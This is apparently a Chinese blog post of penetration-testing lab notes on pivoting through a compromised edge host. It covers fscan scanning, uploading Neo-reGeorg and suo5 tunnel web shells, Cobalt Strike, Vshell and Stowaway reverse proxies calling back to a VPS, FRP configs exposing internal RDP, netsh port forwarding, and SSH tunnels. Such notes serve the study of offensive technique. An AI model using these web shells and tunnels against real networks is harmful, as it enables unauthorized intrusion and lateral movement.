隧道一层代理和端口转发

原创 于 2025-07-13 21:17:45 发布 · 1k 阅读 · 18 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#网络 #安全 #渗透

2.1.2. 一层代理

2.1.2.1. 环境搭建

win2019-1--边缘主机

192.168.68.137-出网--phpstudy

10.10.10.129-不出网

win2008--内网主机

10.10.10.128

Linux--kali

2.1.2.2. 信息收集
网段的信息收集步骤 -- 上传fscan
fscan -h IP/24 全网段扫描
在一些内网中,是禁用ICMP协议的,fscan默认情况下会检测一些poc(弱口令 ms17-010 shiro key)
fscan -h 10.10.10.0/24 -nopoc -np

2.1.2.3. 正向代理
2.1.2.3.1. neo-reg

下载地址:https://github.com/L-codes/Neo-reGeorg

2.1.2.3.1.1. 生成shell文件
python3 neoreg.py generate -k 111

2.1.2.3.1.2. 在该文件夹中找跟你网站信息匹配的shell文件,并上传

2.1.2.3.1.3. 访问该文件是否上传成功

2.1.2.3.1.4. 通过脚本文件链接shell文件
python3 neoreg.py -k 111 -u http://192.168.68.137/tunnel.php

2.1.2.3.1.5. 通过kali链接
vi /etc/proxychains4.conf
proxychains firefox http://10.10.10.128

2.1.2.3.2. SUO5正向代理隧道

下载地址:

https://github.com/zema1/suo5 #链接的客户端

https://github.com/zema1/suo5/tree/v1.3.1/assets #下载shell的链接

2.1.2.3.2.1. 上传shell置目标服务器
http://59.110.6.250:9898/suo5.php php只支持 nginx

2.1.2.3.2.2. 使用工具左连接

2.1.2.4. 反向代理
2.1.2.4.1. CS工具自带的反向代理

2.1.2.4.1.1. 上线主机
windows stager
windows stagless
powershell commnd 
attack
2.1.2.4.1.2. 在上线主机开启代理

2.1.2.4.1.3. 使用工具链接cs开放的端口

2.1.2.4.2. Vshell的代理工具
2.1.2.4.2.1. 上线主机

2.1.2.4.2.2. 切换到主机管理 点击隧道管理 添加隧道

2.1.2.4.2.3. 新增隧道

2.1.2.4.2.4. 使用工具链接即可

linux--proxychains

windows--sockscap

2.1.2.4.3. stowaway

分为两个端,一个服务端,一个客户段,客户端需要上传到目标服务器,服务端在自己的vps上即可。

下载地址:https://github.com/ph4ntonn/Stowaway/releases/tag/v2.2

agent -- 客户端

admin -- 服务端

2.1.2.4.3.1. 启动服务端
./linux_x64_admin -l 9898 #设置监听的端口

2.1.2.4.3.2. 客户端链接服务端
windows_x64_agent.exe -c 59.110.123.141:9898

2.1.2.4.3.3. 开启socks5代理
help -- admin节点查看帮助
detail -- admin节点显示细节
use ID -- 使用节点
socks 9991 -- 节点上使用

2.1.2.4.3.4. 使用工具链接端口
sudo vi /etc/proxychains4.conf
proxychains rdesktop 10.10.10.128

2.1.2.5. 端口转发
2.1.2.5.1. FRP工具

分为两个端 frps(服务端) frpc(客户端)

服务端 -- 在vps

客户端 -- 在跳板机器

在0.50版本之前,他的配置文件的后缀名是 ini文件,之后是tomal文件。

注意:早期的windows版本 不支持新版的frp 得使用旧版,旧版的后缀名是 .ini文件

2.1.2.5.1.1. 配置文件格式
# frps.toml
bindPort = 7000

frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7000


# frpc.toml
serverAddr = "x.x.x.x" #服务器IP
serverPort = 7000 #必须和bindPort一致

[[proxies]] #代理
name = "ssh" #代理的名字
type = "tcp" #协议的类型
localIP = "127.0.0.1" #被转发的IP
localPort = 22 #被转发的端口
remotePort = 6000 #转发到你服务器的端口

[[proxies]]
name = "web"
type = "tcp"
localIP = "127.0.0.1"
localPort = 80
remotePort = 6080

frpc.ini
[common] #链接服务器端的配置
server_addr = 39.105.24.180
server_port = 7000

[rdp2] 
type = tcp
local_ip = 10.10.10.129
local_port = 3389
remote_port = 9638

[rdp] 
type = tcp
local_ip = 10.10.10.129
local_port = 3389
remote_port = 9638
2.1.2.5.1.2. 使用工具
[common] 
server_addr = 59.110.123.141
server_port = 7000

[rdp] 
type = tcp
local_ip = 10.10.10.128
local_port = 80
remote_port = 1234
 ./frps -c frps.toml
 frpc.exe -c frpc.ini


 taskkill /f /im frpc.exe
 pkill frps

2.1.2.5.2. windows端口转发
2.1.2.5.2.1. 本地的端口转发
将本地的3389 端口转发到本地的3340端口
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
listenaddress - 等待连接的本地IP地址。

listenport - 本地侦听TCP端口。

connectaddress - 将传入连接重定向到本地或远程IP地址(或DNS名称)。

netsh interface portproxy add v4tov4 listenport=3340 listenaddress=192.168.68.137 connectport=3389 connectaddress=192.168.68.137
2.1.2.5.2.2. 远程的端口转发
将10.10.10.128的3389 转发 192.168.68.137的3342 端口
win2019 192.168.68.137 10.10.10.129
win2008 10.10.10.128
通信思路 win2019和win2008怎么联系通过10网卡 win2019可不可以实现两张网卡间的通信 192能不能ping同自己10.128

1.我先把 10.10.10.129网卡将10.10.10.128的3389转发过来
netsh interface portproxy add v4tov4 listenaddress=10.10.10.129 listenport=3341 connectaddress=10.10.10.128 connectport=3389 #转发到10.10.10.129:3341上了但是我的kali是192.168.68.130是无法访问10网段的

2.将10.10.10.129的3341端口转发到192.168.68.137:3342端口
netsh interface portproxy add v4tov4 listenaddress=192.168.68.137 listenport=3342 connectaddress=10.10.10.129 connectport=3341
2.1.2.5.3. SSH

参考文章:https://blog.csdn.net/weixin_44268918/article/details/131069608?spm=1001.2014.3001.5501

外部机器一定是 linux--kali
跳板机-linux nat vmnet--centos7--192.168.68.138,10.10.10.122
windows vmnet--win2008--10.10.10.128


常用参数:
  -C:压缩传输,提高传输速度

  -f:将SSH传输转入后台执行,不占用当前的Shell

  -N:建立静默连接(建立了连接,但是看不到具体会话)

  -g:允许远程主机连接本地用于转发的端口

  -L:本地端口转发

  -R:远程端口转发

  -D:动态转发(SOCKS代理)

  -P:指定SSH端口
2.1.2.5.3.1. SSH隧道技术远程转发

这里的远程转发主要是以Linux系统作为跳板,将跳板机上访问的IP地址及端口流量转发至攻击机上的某个端口,从而实现攻击机访问本地的端口能够跳转访问到目标主机端口上的内容。

#在跳板机执行命令,端口转发到kali的9744端口
    ssh -CfNg -R 9744:10.10.10.122:80 root@192.168.68.130
        -C	启用压缩传输,提高慢速网络下的性能
        -f	后台运行(fork to background)
        -N	不执行远程命令(仅建立隧道)
        -g	允许远程主机连接本地转发端口
        -R 1010:192.168.10.150:80	核心参数:远程端口转发
    #在kali中直接访问9744端口的网页即可
    curl http://127.0.0.1:9744
2.1.2.5.3.2. SSH隧道技术本地转发

主动去连接Linux跳板机,将内网机 SSH端口通过防火墙映射出去

攻击机执行命令:
ssh -CfNg -L 3333:10.10.10.128:80 root@192.168.68.138
  -C	启用压缩传输,提高慢速网络下的性能
  -f	后台运行(fork to background)
  -N	不执行远程命令(仅建立隧道)
  -g	允许远程主机连接本地转发端口
  -L:本地端口转发
2.1.2.6. SSH隧道技术动态转发

利用 ssh 隧道的正向 socks 代理把目标的整个内网代出来,任何支持socks 4/5协议的程序都可以使用这个加密通道进行代理访问。

攻击机执行命令:
ssh -D 1212 root@192.168.68.138
  -D:动态转发(SOCKS代理)
2.1.2.6.1. 攻击机设置

到攻击机的浏览器中进行设置,设置socks代理,这里进入浏览器中找到网络设置,设置socks4/5的代理。

虽然ping不通192.168.20.10,但是能够访问到192.168.20.10的页面。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值